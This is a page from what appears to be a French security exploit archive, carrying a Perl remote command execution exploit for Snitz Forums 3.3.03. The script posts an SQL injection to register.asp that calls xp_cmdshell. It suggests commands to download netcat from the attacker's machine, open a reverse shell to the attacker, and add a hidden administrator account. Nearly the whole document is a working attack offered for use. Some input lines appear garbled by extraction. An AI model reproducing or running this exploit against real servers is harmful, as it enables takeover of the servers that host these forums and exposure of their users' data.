Snitz Forum 3.3.03 Remote Command Execution Exploit

    
 
     * Version TXT Disponible ici *

                              #!/usr/bin/perl

                              use Socket;

                              print "\nRemote command execution against Snitz Forums 3.3.03 (and probably others).\n";
                              print "You accept full responsibility for your actions by using this script.\n";
                              print "INTERNAL USE ONLY!! DO NOT DISTRIBUTE!!\n";

                              print "\nWeb server? [www.enterthegame.com]: ";
                              my $webserver = ;
                              chomp $webserver;
                              if( $webserver eq "" )
                              {
                              $webserver = "www.enterthegame.com";
                              }

                              print "\nWeb server port? [80]: ";
                              my $port = ;
                              chomp $port;
                              if( $port eq "" )
                              {
                              $port = 80;
                              }

                              print "\nAbsolute path to \"register.asp\"? [/forum/register.asp]: ";
                              my $path = ;
                              chomp $path;
                              if( $path eq "" )
                              {
                              $path = "/forum/register.asp";
                              }

                              print "\nCommand to execute non-interactively\n";
                              print " Example commands: tftp -i Your.IP.Here GET nc.exe\n";
                              print " nc.exe -e cmd.exe Your.IP.Here YourNetcatListeningPortHere\n";
                              print " or: net user h4x0r /add | net localgroup Administrators h4x0r /add\n";
                              print "Your command: ";
                              my $command = ;
                              chomp $command;
                              $command =~ s/\ /\%20/g;

                              if( open_TCP( FILEHANDLE, $webserver, 80 ) == undef )
                              {
                              print "Error connecting to $webserver\n";
                              exit( 0 );
                              }
                              else
                              {
                              my $data1 = $path . "\?mode\=DoIt";
                              my $data2 = "Email\=\'\%20exec\%20master..xp_cmdshell\%20\'" . $command. "\'\%20--\&Name\=snitz";
                              my $length = length( $data2 );

                              print FILEHANDLE "POST $data1 HTTP/1.1\n";
                              if( $port == 80 )
                              {
                              print FILEHANDLE "Host: $webserver\n";
                              }
                              else
                              {
                              print FILEHANDLE "Host: $webserver:$port\n";
                              }
                              print FILEHANDLE "Accept: */*\n";
                              print FILEHANDLE "User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\n";
                              print FILEHANDLE "Keep-Alive: 300\n";
                              print FILEHANDLE "Referer: http:\/\/$webserver$path\?mode\=Register\n";
                              print FILEHANDLE "Content-Type: application/x-www-form-urlencoded\n";
                              print FILEHANDLE "Content-Length: $length\n\n";
                              print FILEHANDLE "$data2";

                              print "\nSQL injection command sent. If you are waiting for a shell on your listening\n";
                              print "netcat, hit \"enter\" a couple of times to be safe.\n\n";

                              close( FILEHANDLE );
                              }

                              sub open_TCP
                              {
                              my( $FS, $dest, $port ) = @_;

                              my $proto = getprotobyname( 'tcp' );
                              socket( $FS, PF_INET, SOCK_STREAM, $proto );
                              my $sin = sockaddr_in( $port, inet_aton( $dest ));
                              connect( $FS, $sin ) || return undef;

                              my $old_fh = select( $FS );
                              $| = 1;
                              select( $old_fh );
                              return 1;
                              }
                              

   

   

 Audits de Sécurité & Tests Intrusifs F-VNS Security™  Mailing Listes Advisories  Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits